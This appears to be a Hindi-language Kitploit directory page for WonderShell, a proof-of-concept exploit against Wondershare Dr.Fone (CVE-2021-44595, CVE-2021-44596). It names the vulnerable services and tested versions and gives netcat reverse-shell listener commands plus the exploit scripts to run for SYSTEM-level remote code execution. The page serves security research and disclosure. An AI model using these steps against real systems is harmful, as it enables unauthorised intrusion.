Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WonderShell — Wondershare Dr.Fone में CVE-2021-44595 और CVE-2021-44596 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो असुरक्षित सेवाओं के माध्यम से SYSTEM के रूप में दूरस्थ कोड निष्पादन को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/netanelc305/wondershell
विशेषाधिकार वृद्धिशोषणपेनिट्रेशन टेस्टिंग
GitHubnetanelc305/wondershell

WonderShell

Wondershare Dr.Fone में CVE-2021-44595 और CVE-2021-44596 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो असुरक्षित सेवाओं के माध्यम से SYSTEM के रूप में दूरस्थ कोड निष्पादन को सक्षम बनाता है।

रिपॉजिटरी देखें
32134 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WonderShell - CVE - 2021-44595 | CVE - 2021-44596

खोजकर्ता

नेतनेल कोहेन और टोमर पेलेड, BugSec के सुरक्षा शोधकर्ता।

विवरण

Wondershare Dr.Fone का शोषण करने के लिए POC उदाहरण।
Dr.Fone, wondershare द्वारा विकसित एक फ़ोन टूलकिट है, और RCE के लिए संवेदनशील है।
केवल नेटवर्क एक्सेस के साथ, हम SYSTEM उपयोगकर्ता के रूप में रिमोट कोड निष्पादित करने में सफल होते हैं।

संवेदनशील सेवाएँ:

InstallAssistService.exe
ElevationService.exe

परीक्षित संस्करण: 12.0.7 , 11.4

उपयोग

IP और पोर्ट बदलें और निष्पादित करें।

root@kitploit:~
stty raw -echo; (stty size; cat) | nc -lvnp 1338
./ElevationServiceRCE.py
root@kitploit:~
nc -lvnp 1337
./InstallAssistServiceRCE.py

प्रकाशन

https://medium.com/@tomerp_77017/wondershell-a82372914f26

टूल डाउनलोड करें